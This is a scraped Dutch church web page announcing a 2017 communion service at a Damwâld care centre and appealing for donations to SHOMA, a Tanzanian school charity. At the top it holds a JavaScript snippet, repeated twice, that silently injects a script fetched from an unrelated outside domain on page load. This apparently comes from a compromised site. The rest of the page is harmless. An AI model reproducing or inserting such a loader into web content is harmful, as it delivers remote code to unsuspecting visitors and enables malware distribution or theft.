;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Avondmaalsviering Nij Tjaerda - PKN Damwâld
zondag 10 september 2017
16:00 uur
Viering Heilig Avondmaal voor bewoners en omwonenden zorgcentrum Nij Tjaerda Damwâld

Avondmaalsviering Nij Tjaerda

Informatie

Voorganger:Ds. W.L. de Jong, Rinsumageast
Mededeling:Viering Heilig Avondmaal voor bewoners en omwonenden zorgcentrum Nij Tjaerda Damwâld
Locatie: Nij Tjaerda Damwald, Badhuisweg, Damwâld
Collecte informatie
Eerste collecte: Zending
Tweede collecte: Shoma

Stichting onderwijsbevordering noordwest Tanzania-SHOMA Onderwijsvernieuwingsproject

12 jaar geleden is in Hoogeveen de stichting SHOMA opgericht. Dit woord betekent ‘onderwijs’ in het Kihaya, de voertaal in Rubya. Het doel van SHOMA is om in Rubya kansarme kinderen goed onderwijs te geven,waardoor ze zicht krijgen op een betere toekomst!! Rubya ligt ten N.O. van het Victoriameer in Tanzania. Het gebied kenmerkt door extreme armoede. Helaas zijn er veel weeskinderen, veroorzaakt door AIDS. De toegang tot gezondheidszorg is slecht. Zoals op zoveel plekken in de wereld waar armoede heerst , zijn kinderen als eerste de dupe. Officieel is scholing gratis in Rubya, maar door verplichte bijdragen voor lesmateriaal, schooluniformen en schoenen is het voor velen niet haalbaar. Shoma zamelt door allerlei acties geld in om in Rubya o.a. een school te bouwen. Vanuit Burgum hebben Klaas en Betsy Niestijl zich aangesloten bij SHOMA. Samen met vrijwilligers hier en in Tanzania zetten zij zich in voor een betere toekomst voor met name
weeskinderen. Alle acties, o.a. in Burgum e.o., hebben succes! Er gaan inmiddels 350 kinderen naar verschillende scholen in de regio, dankzij de hulp van donateurs. Omdat het onderwijs niet voldoende bleek om door te stromen naar vervolgonderwijs is besloten een school te bouwen, waar Engelstalig onderwijs wordt gegeven door goed opgeleide leerkrachten. Inmiddels is de school gedeeltelijk klaar en gaan er 55 kinderen, verdeeld over 3 groepen, naar KEMPS (Kishasha English Medium Primary School) Ieder schooljaar wordt er een lokaal afgewerkt en wordt er een klas toegevoegd. De leerlingen krijgen elke dag een maaltijd,die bereid wordt in een provisorische keuken. Op termijn hopen we een nieuwe keuken met eetzaal te kunnen bouwen. Op dit moment is een watervoorzieningsproject in voorbereiding, welke ook de bevolking van water voorziet. Shoma is intussen erkend door Wilde Ganzen, een enorme opsteker! Verder heeft zich spontaan een sponsor gemeld, die in juli 2018 tot
€ 15.000 euro wil doneren, wanneer wij hetzelfde bedrag bijeen brengen!! Wij doen ons best. Helpt u
mee?